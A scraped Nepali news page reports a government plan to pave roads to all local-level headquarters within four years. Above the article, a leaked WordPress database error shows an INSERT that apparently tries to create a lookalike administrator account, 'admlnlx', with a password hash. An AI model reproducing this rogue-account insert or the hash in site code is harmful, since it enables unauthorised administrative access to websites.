WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlvC4DOJP6OUeqXbq53OtccGWvgGEO/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 12:52:19', '', 'admlnlx', 'admlnlx')

सबै स्थानीय तहको सदरमुकामसम्म चार वर्षभित्र पक्की सडक बन्ने – Gaule Khabar

सबै स्थानीय तहको सदरमुकामसम्म चार वर्षभित्र पक्की सडक बन्ने

सबै स्थानीय तहको सदरमुकामसम्म चार वर्षभित्र पक्की सडक बन्ने

गाउँले न्यूज, २० बैशाख, काठमाडौं । चार वर्षभित्र सबै स्थानीय तहका केन्द्रलाई कालोपत्रे सडकले जोडिने भएको छ ।
सरकारको आर्थिक वर्ष २०७६–७७ को नीति तथा कार्यक्रम प्रस्तुत गर्दै राष्ट्रपति विद्यादेवी भण्डारीले उक्त्त कुराको जानकारी दिए ।

निर्माणाधीन सडकमा सुरुङ प्रविधि अपनाइने साथै आगामी आर्थिक वर्षभित्र हुम्ला डोल्पामा सडक पुर्‍याइ सबै जिल्ला सडक पहुँच पुर्‍याइने पनि बताए । अब बन्ने सबी सडक दुई लेनको बन्ने भएको पनि बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका